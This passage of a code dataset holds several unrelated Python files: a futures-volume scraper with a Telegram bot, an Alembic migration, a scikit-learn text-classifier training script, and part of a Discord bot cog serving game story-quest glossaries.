██╔══╝░░██║██║╚████║██║░╚═══██╗██╔══██║╚═╝\n ██║░░░░░██║██║░╚███║██║██████╔╝██║░░██║██╗\n ╚═╝░░░░░╚═╝╚═╝░░╚══╝╚═╝╚═════╝░╚═╝░░╚═╝╚═╝\n \"\"\")\n\ndef checkTradeDate(tradeDate_data, tradeDate, url_id, params):\n\n ###########\n # This function lowers the trade date if there is no data \n # Attention: param tradeDate is already Weekday\n # So the function checks when the last update has been and sets the tradeDate;\n ###########\n\n #While Array Len == 0 -> tradeDate nicht richtig -> Minus as long as tradeDate_data is empty\n #While Array Len > 0 -> tradeDate richtig\n\n while(len(tradeDate_data[\"monthData\"]) == 0):\n tradeDateInt = int(tradeDate) - 1\n tradeDate = str(tradeDateInt)\n \n newUrl = \"https://www.cmegroup.com/CmeWS/mvc/Volume/Details/F/\"+ url_id +\"/\"+ tradeDate + \"/P\"\n try: #CME-Group\n response = requests.get(newUrl, params=params, headers=headers) #URL\n response.raise_for_status()\n except requests.exceptions.Timeout:\n logging.exception(\"Exception occured (timeout) - Connect to CME - CheckTradeDate\")\n print(\"time-out\")\n except requests.exceptions.ConnectionError:\n logging.exception(\"Exception occured (conn err) - Connect to CME - CheckTradeDate\")\n print('Connection Error')\n except requests.exceptions.HTTPError:\n logging.exception(\"Exception occured (Bad Gateway) - Test? -CheckTradeDate\")\n print(\"BadGateway - checkTradeDate()\")\n tradeDate_data = response.json() #Data von Url Json\n \n return tradeDate_data\n \ndef printProgressBar(progress):\n\n ####\n # Function that prints the Progress Bar\n ####\n\n print(\"[\", end=\"\")\n\n for i in range(0 , 100):\n if(i < progress): print(\"=\", end=\"\")\n if(i > progress): print(\"-\" , end=\"\")\n\n \n print(\"]\")\n \ndef botrun():\n ### Bot Function ###\n updater = Updater(keys.API_KEY, use_context=True)\n dp = updater.dispatcher\n\n dp.add_handler(CommandHandler(\"start\", start_command))\n dp.add_handler(CommandHandler(\"help\", help_command))\n dp.add_handler(CommandHandler(\"craw\", craw_command))\n dp.add_handler(CommandHandler(\"log\", log_command ))\n dp.add_handler(CommandHandler(\"clear\", clear_command ))\n\n dp.add_handler(MessageHandler(Filters.text, hanlde_message))\n\n dp.add_error_handler(error)\n\n updater.start_polling(5)\n ######\n\ndef main(sc , param = False):\n #bot = telegram.Bot(keys.API_KEY)\n\n ############\n # Main Function\n # Traversing all Datasets (/data/...json)\n ############\n\n\n logging.info(\"Start Process CRAW\")\n #bot.send_message(chat_id=\"2143240853\" ,text=\"Craw gestartet!\")\n dataName_array = [\"Currencies\", \"Energies\" , \"Equities\" , \"Financials\" , \"Grains\" , \"Meats\" , \"Metals\" , \"Softs\"]\n\n #### Standard Werte###\n b = 0\n progress = 0.0\n isCme = False\n ######################\n\n BeautifulPrintouts(\"start\")\n \n inc = 4 #Increment in Google Sheets??\n ch = 'B' #Used for GoogleSheets Table\n\n #For Schleife -> Gehe durch Datensätze (in Data ordner)\n for b in range (0, 8):\n\n inc = 4 #Excel\n\n\n with open(\"data/\" + dataName_array[b] + \".json\") as f:\n info_data = json.load(f)\n\n print(\"Fetching: \" + dataName_array[b] + \".json\")\n\n printProgressBar(progress)\n\n print(\"Progress: \" + str(progress) + \"%\\n\")\n\n\n for l in range(0 , len(info_data[\"infoData\"])):\n #####\n # Traversing through infoData from .json Datasets\n #####\n\n # Retrys #\n # Reset every new Dataset # \n retries = 1\n success = False\n\n rangeS = \"Kontraktvolumen!\" + str(ch) + str(inc) #Name der Tabelle auf GoogleSheets! \n \n progress = round(progress + (12.5/len(info_data[\"infoData\"])), 2)\n\n if(info_data[\"infoData\"][l][\"from\"] == \"theice\"): \n #####################\n # Ist TheIce url?\n # GetData safe in data_ice variable\n #####################\n\n isCme = False\n\n params_ice = {\n \"getContractsAsJson\": \"\",\n \"productId\": info_data[\"infoData\"][l][\"url-id\"], \n \"hubId\": info_data[\"infoData\"][l][\"hub-id\"], \n } \n\n url_ice = \"https://www.theice.com/marketdata/DelayedMarkets.shtml?\"\n while not success:\n try: #TheIce\n response_Ice = requests.get(url_ice, params=params_ice, headers=headers)\n response_Ice.raise_for_status()\n data_ice = response_Ice.json() #Data von Url Json\n success = True\n except requests.exceptions.Timeout:\n print(\"timeOut - TheICE - Main()\")\n wait = retries*30\n logging.warning(\"Exception occured - Timeout - ICE - Main() - Retrying: \" + str(retries) + \" Seconds \" + str(wait))\n # logging.exception(\"Exception occured - Timeout - ICE - Main() - Retrying: \" + str(retries) + \"Seconds \" + str(wait))\n time.sleep(wait)\n retries += 1 \n except requests.exceptions.ConnectionError:\n print(\"ConnErr - TheIce - Main()\")\n wait = retries*30\n logging.warning(\"Exception occured (conn err) - Connect to TheICE - Main() - Retrying: \" + str(retries) + \" Seconds \" + str(wait))\n # logging.exception(\"Exception occured (conn err) - Connect to TheICE - Main() - Retrying: \" + str(retries) + \"Seconds \" + str(wait))\n time.sleep(wait)\n retries += 1 \n except requests.exceptions.HTTPError:\n print(\"BadGateway - TheICE - Main()\")\n wait = retries*30\n logging.warning(\"Exception occured (Bad Gateway) - Test? - TheICE - Main() - Retrying:\" + str(retries) + \" Seconds\" + str(wait))\n # logging.exception(\"Exception occured (Bad Gateway) - Test? - TheICE - Main() - Retrying:\" + str(retries) + \"Seconds\" + str(wait))\n time.sleep(wait)\n retries += 1 \n\n\n\n if(info_data[\"infoData\"][l][\"from\"] == \"cme\"): \n #####################\n # Ist cme url?\n # Get Data and safe into DataCME variable\n # Calls CheckTradeDate Function to prevent saving empty Dataset to variable\n #####################\n\n params = {\n \"tradeDate\": tradeDate, \n \"pageSize\": \"50\",\n \"_\": \"1620683546888\"\n }\n\n url_id = (info_data[\"infoData\"][l][\"url-id\"])\n\n url = \"https://www.cmegroup.com/CmeWS/mvc/Volume/Details/F/\"+ url_id +\"/\" + tradeDate + \"/P\"\n print(url)\n\n while not success:\n try: #CME-Group\n response = requests.get(url, params=params, headers=headers) #URL\n response.raise_for_status()\n data_Cme_NC = response.json() #Data von Url Json\n data_Cme = checkTradeDate(data_Cme_NC, tradeDate, url_id, params)\n success = True\n except requests.exceptions.Timeout:\n wait = retries * 30\n logging.warning(\"Exception occured (timeout) - Connect to CME - Main() - Retries: \" + str(retries) + \" Wait: \" + str(wait) )\n # logging.exception(\"Exception occured (timeout) - Connect to CME - Main() - Retries: \" + str(retries) + \"Wait: \" + str(wait) )\n time.sleep(wait)\n retries += 1\n print(\"time-out\")\n except requests.exceptions.ConnectionError:\n wait = retries * 30\n logging.warning(\"Exception occured (conn err) - Connect to CME - Main() - Retries: \" + str(retries) + \" Wait: \" + str(wait))\n # logging.exception(\"Exception occured (conn err) - Connect to CME - Main() - Retries: \" + str(retries) + \"Wait: \" + str(wait))\n time.sleep(wait)\n retries += 1 \n print('Connection Error')\n except requests.exceptions.HTTPError:\n wait = retries * 30\n logging.warning(\"Exception occured (Bad Gateway) - Test? - CME - Main() - Retries: \" + str(retries) + \" Wait: \" + (wait))\n # logging.exception(\"Exception occured (Bad Gateway) - Test? - CME - Main() - Retries: \" + str(retries) + \"Wait: \" + (wait))\n time.sleep(wait)\n retries += 1\n print(\"BadGateway - CME - Main()\")\n \n\n\n isCme = True\n\n name = info_data[\"infoData\"][l][\"name\"]\n i = 0 #für schleife monate reset\n aoa = [[name], [\"MONAT\", \"TOTAL\"]] # Array for Data -> initialized with Name, l.377,387 append Data of ICE/CME\n\n while i < 5:\n # Traversing through Data of ICE/CME\n if(isCme == True):\n if i == len(data_Cme[\"monthData\"]): #Exit wenn nicht mehr monate im Array\n break\n\n month = data_Cme[\"monthData\"][i][\"month\"]\n totalVolume = data_Cme[\"monthData\"][i][\"totalVolume\"]\n arrayMonat = [month, totalVolume]\n aoa.append(arrayMonat) # Apend Month to aoa Array (Array of Data)\n\n \n if(isCme == False):\n if i == len(data_ice): #Exit wenn nicht mehr monate im Array \n break\n\n month = data_ice[i][\"marketStrip\"]\n totalVolume = data_ice[i][\"volume\"]\n arrayMonat = [month, totalVolume]\n aoa.append(arrayMonat) # Append Month to aoa Array (Array of Data)\n\n\n i = i + 1 #Increment\n\n inc = inc + 8\n\n #Write aoa to GoogleSheet\n # Hier noch ein retry block rein?\n try:\n request = sheet.values().update(spreadsheetId=SAMPLE_SPREADSHEET_ID, \n range=rangeS ,valueInputOption=\"USER_ENTERED\", body={\"values\": aoa}).execute()\n except: \n logging.exception(\"Connection error - could not be pushed to sheet\")\n \n i = 0 #reset für nächsten durchlauf\n\n ch = chr(ord(ch) + 3) #Increment in GoogleSheet(-> Jeder Datensatz soll nebeneinander stehen B wird zu B+3=E)\n\n BeautifulPrintouts(\"end\")\n #bot.send_message(chat_id=\"2143240853\" ,text=\"Craw beendet!\")\n logging.info(\"Finished Process CRAW\")\n if(param == False):\n s.enter(3600, 1, main, (sc,)) #Run every hour\n \n \n\nbotrun()\n##Start after 5 SEC ###############\ns.enter(5, 1, main, (s,False))\ns.run()\n#################################\n\n#Notifiyer wenn Crash (only in log rn)\n#BOT\n #Clear Log\n #Last run\n #Next run?\n","repo_name":"PaulKalho/Craw","sub_path":"root.py","file_name":"root.py","file_ext":"py","file_size_in_byte":19719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"34621001295","text":"\"\"\"coordinates column added\n\nRevision ID: 335ad9825bf5\nRevises: cb2613ae9f03\nCreate Date: 2020-10-08 06:02:44.414627\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = \"335ad9825bf5\"\ndown_revision = \"cb2613ae9f03\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column(\n \"gmaps_business\", sa.Column(\"coordinates\", sa.Text(), nullable=True)\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column(\"gmaps_business\", \"coordinates\")\n # ### end Alembic commands ###\n","repo_name":"sintimaski/bfs-be","sub_path":"migrations/versions/335ad9825bf5_coordinates_column_added.py","file_name":"335ad9825bf5_coordinates_column_added.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"10974211884","text":"import sys\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score, f1_score\nfrom sklearn.metrics import precision_recall_fscore_support\nfrom sklearn.externals import joblib\n\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import RandomForestClassifier\n\ndf = pd.read_csv(sys.argv[1], index_col=0)\n\n\n# Long strings are usually a sign of bad data so lets stick to fewer than 300 characters for training.\ndf = df[df['CLMANT_TXT'].str.len() < 300]\n\n\n# Lets separate data points that dont have an approve label from our dataset.\ndfOut = df[(~df['CLMANT_TXT'].isnull()) & (df['newClass'].isnull())]\ndf = df[(~df['CLMANT_TXT'].isnull()) & (~df['newClass'].isnull())]\n\nprint('\\n')\nprint('vectorizing text')\nprint('\\n')\n\n# Initialize a Count Vectorizer with a minimum of 10 appearance of a word for significance, \n# english stopwords and up to 3 word ngrams.\nvectorizer = CountVectorizer(min_df=10, ngram_range=(1,3), stop_words='english') \n\n# define the features\nX = df['CLMANT_TXT']\n\n#This are the labels we are trying to predict\ny = np.array(df['newClass'])\n\n# Split into a training and testing set.\nX_train, X_test, y_train, y_test, i_train, i_test = train_test_split(X, y, df.index, test_size=0.7, random_state=42)\n\nprint('\\n')\nprint('Training model. This may take a while and there might be a few warnings but dont worry, it will work.')\nprint('\\n')\n\n# create the feature space\n# fit_transform to learn from only the training data\n# transform to apply the learned features from the training data to the test data\nX_train = vectorizer.fit_transform(X_train)\nX_test = vectorizer.transform(X_test)\n\n# Initialize a Logistic Regression Model.\nclf = LogisticRegression(multi_class='ovr', solver='lbfgs', n_jobs=-1, max_iter=1000)\n\n# Train a model\nclf.fit(X_train, y_train)\n\n# Measure accuracy\ny_pred = clf.predict(X_test)\n\nscore = str(clf.score(X_test, y_test))\n\nprint('our models accuracy is: ' + score)\n\nprint('\\n')\n\n# Measure presicion, recall, f1 score\nprint('our models weighted precision, recall and f1score are as follows: ')\nprint(precision_recall_fscore_support(y_test, y_pred, average='weighted'))\n\nprint('\\n')\n\n# get codes for prediction\ndfLabels = pd.read_excel('../data/Contention_Dictionary.xlsx')\ndLabels = {}\nfor index, row in dfLabels.iterrows():\n dLabels[row['New Contention Classification Text'].lower().strip()] = row['IDs']\n\n# Saving the test run.\ndf1 = df[['CLMANT_TXT', 'CNTNTN_CLSFCN_ID', 'CNTNTN_CLSFCN_TXT', 'newClass']].loc[i_test]\ndf1['predictedLabel'] = y_pred\ndf1['predID'] = df1.apply(lambda x: dLabels[x['predictedLabel']], 1)\ndf1['correctPred'] = df1.apply(lambda x: int(x['newClass'] == x['predictedLabel']), 1)\ndf1.to_csv('../data/testResults.csv')\n\n# build the final model\n# after feature engineering, model selection, and hyperparameter tuning is complete\n# use all available data to maximize the use of data for the final classifier\n# i.e. fit the vectorizer and classifer on all of X (not only X_train)\n# since no futher experimentation is occuring\nX_vect = vectorizer.fit_transform(X)\nclf = LogisticRegression(multi_class='ovr', solver='lbfgs', n_jobs=-1, max_iter=1000)\nclf.fit(X_vect, y)\n\n# save the vectorizer object as vectorizer.pkl\njoblib.dump(vectorizer, filename='../modelsAndTransformations/vectorizer.pkl')\n\n# save the classifier object as LRclf.pkl\njoblib.dump(clf, filename='../modelsAndTransformations/LRclf.pkl')\n\n# Running data with bad labels through the model.\nprint('Predicting on data with unidentified labels. Saved in ../data/predictionOnDataWithBadLabels.csv')\ndfBad = vectorizer.transform(dfOut['CLMANT_TXT'])\npBad = clf.predict(dfBad)\ndfOut['predLabel'] = pBad\ndfOut['predID'] = dfOut.apply(lambda x: dLabels[x['predLabel']], 1)\ndfOut.to_csv('../data/predictionOnDataWithBadLabels.csv')\n\nprint('Done. A copy of the test results has been saved to testResults.csv in the data folder')\n","repo_name":"BGebken/Linnaeus-Classifier","sub_path":"preppingScripts/modelBuilder.py","file_name":"modelBuilder.py","file_ext":"py","file_size_in_byte":4007,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"}
+{"seq_id":"27011712130","text":"import discord\r\nimport aiohttp\r\nimport urllib, json #For fetching JSON from alliancewar.com\r\nimport os\r\nimport requests\r\nimport re\r\nimport json\r\nfrom .utils.dataIO import dataIO\r\nfrom .utils import chat_formatting as chat\r\nfrom collections import defaultdict, ChainMap, namedtuple, OrderedDict\r\n\r\nfrom discord.ext import commands\r\nfrom __main__ import send_cmd_help\r\nfrom cogs.mcocTools import (StaticGameData, PagesMenu, KABAM_ICON, COLLECTOR_ICON, CDTHelperFunctions, GSHandler, CDT_COLORS)\r\nfrom cogs.mcocTools import (SearchExpr, P0Expr, ParenExpr, SearchNumber, SearchPhrase, ExplicitKeyword, SearchNumber, SearchWord, SearchPhrase) #search stuff\r\nfrom cogs.mcoc import ChampConverter, ChampConverterDebug, Champion\r\n\r\nGSHEET_ICON = 'https://d2jixqqjqj5d23.cloudfront.net/assets/developer/imgs/icons/google-spreadsheet-icon.png'\r\nACT6_SHEET = 'https://docs.google.com/spreadsheets/d/1xTw37M_fwYClNfgvi7-09M6MLIcgMziTfM5_MGbAs0Q/view'\r\nREBIRTH = 'https://cdn.discordapp.com/attachments/398210253923024902/556216721933991936/46BBFB298E7EEA7DD8A5A1FAC65FBA621A6212B5.jpg'\r\nPATREON = 'https://patreon.com/collectorbot'\r\n\r\nclass STORYQUEST:\r\n EmojiReact = namedtuple('EmojiReact', 'emoji include path text')\r\n\r\n def __init__(self, bot):\r\n self.bot = bot\r\n self.search_parser = SearchExpr.parser()\r\n self.gsheet_handler = GSHandler(bot)\r\n self.gsheet_handler.register_gsheet(\r\n name='cdt_glossary',\r\n gkey='1Up5SpQDhp_SUOb5UFuD6BwkVKsJ4ZKN13DHHNJrNrEc',\r\n local='data/storyquest/cdt_glossary.json',\r\n sheet_name='glossary',\r\n range_name='glossary_export'\r\n )\r\n self.gsheet_handler.register_gsheet(\r\n name='cdt_export',\r\n gkey='1Up5SpQDhp_SUOb5UFuD6BwkVKsJ4ZKN13DHHNJrNrEc',\r\n local='data/storyquest/cdt_export.json',\r\n sheet_name='export',\r\n range_name='export'\r\n )\r\n self.gsheet_handler.register_gsheet(\r\n name='cdt_paths',\r\n gkey='1Up5SpQDhp_SUOb5UFuD6BwkVKsJ4ZKN13DHHNJrNrEc',\r\n local='data/storyquest/cdt_paths.json',\r\n sheet_name='paths',\r\n range_name='paths'\r\n )\r\n self.gsheet_handler.register_gsheet(\r\n name='cdt_globals',\r\n gkey='1Up5SpQDhp_SUOb5UFuD6BwkVKsJ4ZKN13DHHNJrNrEc',\r\n local='data/storyquest/cdt_globals.json',\r\n sheet_name='globals',\r\n range_name='globals'\r\n )\r\n try:\r\n self.glossary = dataIO.load_json('data/storyquest/cdt_glossary.json')\r\n self.glossary_desc = dataIO.load_json('data/storyquest/cdt_glossary_desc.json')\r\n self.glossary_tips = dataIO.load_json('data/storyquest/cdt_glossary_tips.json')\r\n self.glossary_keys = dataIO.load_json('data/storyquest/cdt_glossary_keys.json')\r\n self.export = dataIO.load_json('data/storyquest/cdt_export.json')\r\n self.paths = dataIO.load_json('data/storyquest/cdt_paths.json')\r\n self.globals = dataIO.load_json('data/storyquest/cdt_globals.json')\r\n except:\r\n self.glossary = {}\r\n self.glossary_tips = {}\r\n self.glossary_keys = {}\r\n self.glossary_desc = {}\r\n self.export = {}\r\n self.paths = {}\r\n self.globals = {}\r\n self.all_emojis = OrderedDict([(i.emoji, i) for i in (\r\n self.EmojiReact(\"0⃣\", 0, 'path0', ':zero:'),\r\n self.EmojiReact(\"1⃣\", 1, 'path1', ':one:'),\r\n self.EmojiReact(\"2⃣\", 2, 'path2', ':two:'),\r\n self.EmojiReact(\"3⃣\", 3, 'path3', ':three:'),\r\n self.EmojiReact(\"4⃣\", 4, 'path4', ':four:'),\r\n self.EmojiReact(\"5⃣\", 5, 'path5', ':five:'),\r\n self.EmojiReact(\"6⃣\", 6, 'path6', ':six:'),\r\n self.EmojiReact(\"7⃣\", 7, 'path7', ':seven:'),\r\n self.EmojiReact(\"8⃣\", 8, 'path8', ':eight:'),\r\n self.EmojiReact(\"9⃣\", 9, 'path9', ':nine:'),\r\n self.EmojiReact(\"🔟\", 10, 'path10', ':keycap_ten:'),\r\n )])\r\n\r\n async def _load_sq(self, force=False):\r\n if self.glossary == {} or self.export == {} or force is True:\r\n await self.gsheet_handler.cache_gsheets('cdt_glossary')\r\n await self.gsheet_handler.cache_gsheets('cdt_export')\r\n await self.gsheet_handler.cache_gsheets('cdt_paths')\r\n await self.gsheet_handler.cache_gsheets('cdt_globals')\r\n temp = dataIO.load_json('data/storyquest/cdt_glossary.json')\r\n glossary_keys = {}\r\n glossary_tips = {}\r\n glossary_desc = {}\r\n # glossary_titles = {}\r\n for t in temp.keys():\r\n if t not in ('', '-', '_headers'):\r\n glossary_desc.update({t: temp[t]['description']})\r\n glossary_tips.update({t: temp[t]['tips']})\r\n glossary_keys.update({t: temp[t]['title']})\r\n # glossary_titles.update({t: temp[t]['title']})\r\n self.glossary_desc = glossary_desc\r\n self.glossary_keys = glossary_keys\r\n self.glossary_tips = glossary_tips\r\n # self.glossary_titles = glossary_titles\r\n self.glossary = temp\r\n dataIO.save_json('data/storyquest/cdt_glossary.json', self.glossary)\r\n dataIO.save_json('data/storyquest/cdt_glossary_desc.json', self.glossary_desc)\r\n dataIO.save_json('data/storyquest/cdt_glossary_keys.json', self.glossary_keys)\r\n dataIO.save_json('data/storyquest/cdt_glossary_tips.json', self.glossary_tips)\r\n # dataIO.save_json('data/storyquest/cdt_glossary_titles.json', self.glossary_titles)\r\n # self.glossary_keys = dataIO.load_json('data/storyquest/cdt_glossary_keys.json')\r\n self.export = dataIO.load_json('data/storyquest/cdt_export.json')\r\n self.paths = dataIO.load_json('data/storyquest/cdt_paths.json')\r\n self.globals = dataIO.load_json('data/storyquest/cdt_globals.json')\r\n\r\n return\r\n\r\n @commands.group(pass_context=True, aliases=('sq',))\r\n async def storyquest(self, ctx):\r\n \"\"\"[BETA]: Story Quest\r\n Supporting Act 6.1.x\r\n Boost Glossary & Paths\"\"\"\r\n\r\n if ctx.invoked_subcommand is None:\r\n await send_cmd_help(ctx)\r\n\r\n @storyquest.command(hidden=True, name='fetch')\r\n async def _fetch(self):\r\n await self._load_sq(force=True)\r\n\r\n @commands.command(pass_context=True, name='glossary', aliases=('boost',))\r\n async def _boost_info(self, ctx, *, boost=None):\r\n \"\"\"Story Quest Glossary\r\n Supporting Act 5 & Act 6 node boosts.\"\"\"\r\n keys = []\r\n for k in self.glossary.keys():\r\n if k != \"-\" and k != \"_headers\" and k != \"\":\r\n keys.append(k)\r\n keys = sorted(keys)\r\n author = ctx.message.author\r\n if ctx.message.channel.is_private:\r\n ucolor = discord.Color.gold()\r\n else:\r\n ucolor = author.color\r\n if boost.lower() not in keys:\r\n for k in keys:\r\n if self.glossary[k]['title'].lower() == boost.lower():\r\n boost = k\r\n continue\r\n\r\n if boost is not None and boost.lower() in keys:\r\n data = discord.Embed(color=ucolor, title='{}'.format(self.glossary[boost.lower()]['title']), description='', url=PATREON)\r\n data.set_thumbnail(url=COLLECTOR_ICON)\r\n data.set_author(name='Support CollectorDevTeam')\r\n data.set_thumbnail(url=REBIRTH)\r\n # data.set_author(name='Glossary by StarFighter + DragonFei + Royal', icon_url=GSHEET_ICON)\r\n data.set_footer(\r\n text='Glossary by StarFighter + DragonFei + Royal | Requested by {}'.format(author.display_name),\r\n icon_url=GSHEET_ICON)\r\n data.description = self.glossary[boost.lower()]['description']\r\n if self.glossary[boost.lower()]['tips'] != \"\":\r\n data.add_field(name='CollectorVerse Tips', value=self.glossary[boost.lower()]['tips'])\r\n await self.bot.say(embed=data)\r\n return\r\n elif boost is None:\r\n pages = []\r\n glossary = ''\r\n for key in keys:\r\n try:\r\n glossary += '__{}__\\n{}\\n\\n'.format(key.title(), self.glossary[key]['description'])\r\n except KeyError:\r\n raise KeyError('Cannot resolve {}'.format(boost.lower()))\r\n glossary = chat.pagify(glossary)\r\n for g in glossary:\r\n data = discord.Embed(color=ucolor, title='Story Quest Boost Glossary', description=g, url=ACT6_SHEET)\r\n data.set_thumbnail(url=REBIRTH)\r\n # data.set_author(name='Glossary by StarFighter + DragonFei + Royal', icon_url=GSHEET_ICON)\r\n data.set_footer(\r\n text='Glossary by StarFighter + DragonFei + Royal | Requested by {}'.format(author.display_name),\r\n icon_url=GSHEET_ICON)\r\n pages.append(data)\r\n if len(pages) > 0:\r\n menu = PagesMenu(self.bot, timeout=120, delete_onX=True, add_pageof=True)\r\n await menu.menu_start(pages)\r\n else:\r\n result = self.search_parser.parse_string(boost)\r\n print(result.elements)\r\n matches = result.match(self.glossary_desc, self.glossary_keys)\r\n package = []\r\n for k in sorted(matches):\r\n package.append('\\n__{}__\\n{}'.format(\r\n self.glossary[k]['title'], self.glossary[k]['description']))\r\n pages = chat.pagify('\\n'.join(package))\r\n page_list = []\r\n for page in pages:\r\n data = discord.Embed(title='Support CollectorDevTeam', description=page, color=ucolor, url=PATREON)\r\n data.set_thumbnail(url=COLLECTOR_ICON)\r\n data.set_author(name='Glossary Search: [{}]'.format(boost.lower()))\r\n data.set_footer(\r\n text='Glossary by StarFighter + DragonFei + Royal | Requested by {}'.format(author.display_name),\r\n icon_url=GSHEET_ICON)\r\n page_list.append(data)\r\n menu = PagesMenu(self.bot, timeout=120, delete_onX=True, add_pageof=True)\r\n await menu.menu_start(page_list)\r\n return\r\n\r\n\r\n # if boost in boost_keys:\r\n # await self.bot.say('debug: boost found')\r\n # await self.bot.say(self.glossary[boost]['description'])\r\n # else:\r\n # await self.bot.say('boost not found '\r\n # 'available boosts')\r\n\r\n @commands.command(pass_context=True, name='act', aliases=('sq path',))\r\n async def _paths(self, ctx, map=None, path=None, verbose=True):\r\n \"\"\"[BETA] Story Quest\r\n Act 6 Fights\r\n maps: 6.1.1, 6.1.2, 6.1.3, 6.1.4, 6.1.5, 6.1.6\r\n paths: path1 to path10\r\n verbose: If true, will play all fights sequentially\r\n \"\"\"\r\n author = ctx.message.author\r\n ucolor = discord.Color.gold()\r\n if ctx.message.channel.is_private is False:\r\n ucolor = author.color\r\n data = discord.Embed(color=ucolor, title='Story Quest Help', description='')\r\n starfire_maps = ('6.1.1', '6.1.2', '6.1.3', '6.1.4', '6.1.5', '6.1.6')\r\n valid_maps = []\r\n for k in self.paths.keys():\r\n if k != '_headers' and k != 'emoji' and k != 'map' and 'rttl_' not in k:\r\n valid_maps.append(k)\r\n valid_maps.sort()\r\n if map not in valid_maps or map is None:\r\n message = 'Select a valid map:\\n'\r\n message += '5.3: 5.3.1, 5.3.2, 5.3.3, 5.3.4, 5.3.5, 5.3.6\\n'\r\n message += '5.4: 5.4.1, 5.4.2, 5.4.3, 5.4.4, 5.4.5, 5.4.6\\n'\r\n message += '6.1: 6.1.1, 6.1.2, 6.1.3, 6.1.4, 6.1.5, 6.1.6\\n'\r\n message += '6.2: N/A\\n'\r\n # message += '6.2.1, 6.2.2, 6.2.3, 6.2.4, 6.2.5, 6.2.6\\n'\r\n # message += ', '.join(valid_maps)\r\n data.description = message\r\n await self.bot.say(embed=data)\r\n return\r\n\r\n all_paths = self.paths['_headers']['paths']\r\n all_paths = list(filter(lambda a: a != '', all_paths)) #remove \"\" from valid paths\r\n valid_paths = []\r\n for a in all_paths:\r\n if a in self.paths[map].keys() and self.paths[map][a] != \"\":\r\n valid_paths.append(a)\r\n\r\n if path not in valid_paths and path is not None:\r\n if \"path{}\".format(path) in valid_paths:\r\n path = \"path{}\".format(path)\r\n else:\r\n return\r\n\r\n if path is None or path not in valid_paths:\r\n attrs = {}\r\n attrs['star'] = 5\r\n attrs['rank'] = 5\r\n if self.globals[map]['chapter_champ'] != '':\r\n boss = await ChampConverter.get_champion(self, self.bot, self.globals[map]['chapter_champ'], attrs)\r\n data.title = 'Map {}\\nAct: {}\\nChapter: {}\\nQuest: {}'.\\\r\n format(map, self.globals[map]['act_title'],\r\n self.globals[map]['chapter_title'],\r\n self.globals[map]['quest_title'])\r\n data.set_thumbnail(url=boss.get_avatar())\r\n print(valid_paths)\r\n data.set_image(url=self.globals[map]['chapter_image'])\r\n\r\n\r\n for p in valid_paths:\r\n if p is not None and p != \"\":\r\n key = '{}-{}-1'.format(map, p)\r\n for emoji in self.all_emojis.values():\r\n if emoji.path == p:\r\n data.add_field(name=emoji.text, value='Quest: {}\\nTiles: {}\\nEnergy: {}\\nNotes: {}\\n'\r\n .format(p[-1:],self.export[key]['tiles'],\r\n self.export[key]['tiles']*3,\r\n self.export[key]['notes']))\r\n continue\r\n description = ''\r\n gboosts = self.export[key]['global'].split(', ')\r\n for g in gboosts:\r\n if g != '-' and g != '':\r\n # description += 'Global: {}\\n{}\\n\\n'.format(self.glossary_titles[g], self.glossary_desc[g])\r\n data.add_field(name='Global Boost: {}'.format(self.glossary_keys[g].title()),\r\n value='{}'.format(self.glossary_desc[g]))\r\n if self.glossary_tips[g] != \"\":\r\n data.add_field(name='CollectorVerse Tips', value=self.glossary_tips[g])\r\n\r\n # data.description=description\r\n message = await self.bot.say(embed=data)\r\n self.included_emojis = set()\r\n for emoji in self.all_emojis.values():\r\n if emoji.path in valid_paths:\r\n try:\r\n print(emoji.emoji)\r\n await self.bot.add_reaction(message, emoji.emoji)\r\n except:\r\n raise KeyError('Unknwon Emoji : {}'.format(emoji.emoji))\r\n self.included_emojis.add(emoji.emoji)\r\n react = await self.bot.wait_for_reaction(message=message, user=ctx.message.author,\r\n timeout=30, emoji=self.included_emojis)\r\n if react is None:\r\n try:\r\n await self.bot.clear_reactions(message)\r\n except discord.errors.NotFound:\r\n # logger.warn(\"Message has been deleted\")\r\n print('Message deleted')\r\n except discord.Forbidden:\r\n # logger.warn(\"clear_reactions didn't work\")\r\n for emoji in self.included_emojis:\r\n await self.bot.remove_reaction(message, emoji, self.bot.user)\r\n return\r\n emoji = react.reaction.emoji\r\n path = self.all_emojis[emoji].path if emoji in self.all_emojis else None\r\n\r\n if path in valid_paths:\r\n tiles = self.paths[map][path]\r\n tiles = tiles.split(',')\r\n pages = []\r\n i = 1\r\n for tile in tiles:\r\n key = '{}-{}-{}'.format(map, path, tile)\r\n attrs = {}\r\n mob = self.export[key]['mob'].lower()\r\n attrs['star'] = 5\r\n attrs['rank'] = 5\r\n champion = await ChampConverter.get_champion(self, self.bot, mob, attrs)\r\n power = self.export[key]['power']\r\n hp = self.export[key]['hp']\r\n boosts = self.export[key]['boosts'].split(', ')\r\n gboosts = self.export[key]['global'].split(', ')\r\n notes = self.export[key]['notes']\r\n # attack = self.export[key]['attack']\r\n data = discord.Embed(color=CDT_COLORS[champion.klass], title='Act {} Path {} | Fight {}'.format(map, path[-1:], i),\r\n description='', url=ACT6_SHEET)\r\n tiles = self.export[key]['tiles']\r\n if champion.full_name is not None:\r\n if power is not None:\r\n data.set_author(name='{} : {:,}'.format(champion.full_name, power))\r\n else:\r\n data.set_author(name='{}'.format(champion.full_name))\r\n if champion.get_avatar() is not None:\r\n data.set_thumbnail(url=champion.get_avatar())\r\n if tiles != '':\r\n data.description += '\\nTiles: {}\\n<:energy:557675957515845634> {:,}'.format(tiles, tiles*3)\r\n if hp != '':\r\n data.description += '\\n<:friendshp:344221218708389888> {:,}'.format(hp)\r\n else:\r\n data.description += '\\n<:friendshp:344221218708389888> ???'\r\n\r\n for g in gboosts:\r\n if g != '-' and g != '':\r\n 